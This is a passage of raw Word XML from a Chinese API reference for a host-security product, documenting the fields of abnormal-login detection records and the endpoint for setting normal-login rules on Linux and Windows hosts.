          </w:tcPr>
          <w:p w14:paraId="0DD9DED2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7A45D9DB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>标签</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7BEA83CD" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3D74A01B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>loginTime</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3E2F0A12" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2DA21B59" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int(10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3EFFF1C2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>登录时间，时间戳，精确到秒</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="595F6231" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6ECF57FD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>uname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="236F8351" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="080D7E64" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="08B66C24" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>用户名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1BED1571" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3B46C5B9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>clientIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="251C0E78" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4063D747" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="514695C9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>来源IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7360BDEC" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="715C4639" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>clientLocation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7BFEDF0E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7BC02115" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="14C20C5B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>登录区域</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="566C3405" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6162EFC8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>evilIpDb</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2B95BEF9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2ACC1ED7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint(1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="73C7E369" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是否恶意IP库；0-否,1-是</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6056146D" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="10148DD8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>crackSuccess</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7F924BC4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2A71962A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint(1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="629A9BC1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>暴力破解成功的登录：0-否；1-是</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7B7CB68C" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="615A8737" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>abnormalIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="69023F37" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="164012F3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint(1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3323B252" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>不在常用ip段登录，0:否,1：是</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="552D1A2B" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7A7412FD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>abnormalLocation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5209771C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="502B491C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint(1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="27A08C24" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>不在常用区域的登录，0-否；1-是</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7A9DD77F" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3E51BC56" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>abnormalTime</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="60B30B7A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4FCC3829" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint(1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="68936BDC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>不在常用时间的登录，0:否,1：是</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1088FC2F" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="146117A7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>loginRuleId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6BD52686" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Set</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6B33E01B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(24)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="40296EB5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>正常登录规则ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="723F5629" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="142" w:name="设置规则"/>
      <w:bookmarkEnd w:id="141"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>设置规则</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D960DA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>该接口提供Linux/Windows异常登录设置正常登录规则功能。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68654BB5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="111647A9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>POST /external/api/detect/abnormallogin/{linux,win}/rule</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC7CDE7"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2398"/>
        <w:gridCol w:w="1129"/>
        <w:gridCol w:w="900"/>
        <w:gridCol w:w="5655"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="61DF2A6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232D089" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="22770BC3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4C0AF235" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是否必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5AFAC833" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="10959EFB" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="496AEED6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>realmType</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="265968C7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4F155663" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="009FE15F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机范围，1：自定义，包括业务组、主机； 0：全部主机</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1458E9E8" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5700AFC4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>groups</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5063DA77" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="21C0EABD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="00FA1088" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>业务组列表，如果realmType=1, 则agentIds和groups至少有一个不为空</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1C63BBE5" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="32121B1C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>agentIds</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7BA6DE7E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4BB27DBF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="198EF543" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机列表，如果realmType=1, 则agentIds和groups至少有一个不为空</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="214EE725" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="392C0EA4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>loginIpInfo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6A3A8A3C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Object</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="62D605C6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="47A85EF0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>登录IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5838CC36" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6B0634A1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>loginTimeInfo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="681DFB8C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Object</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="61481BD3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2660520F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>登录时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7C343953" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="15FF0764" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>loginLocationInfo Object</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="73CB3DA6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5708FD98" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>登录区域</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0EF58677" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2D736664" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7A882AE5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="54E29C3C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="14908C2E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="085E8726" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机名（windows无该参数）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3F2BDCE6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>loginIpInfo数据结构：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="902"/>
        <w:gridCol w:w="777"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="3280"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="26086AE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0C643D7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2125523E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2FD0E4C6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是否必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
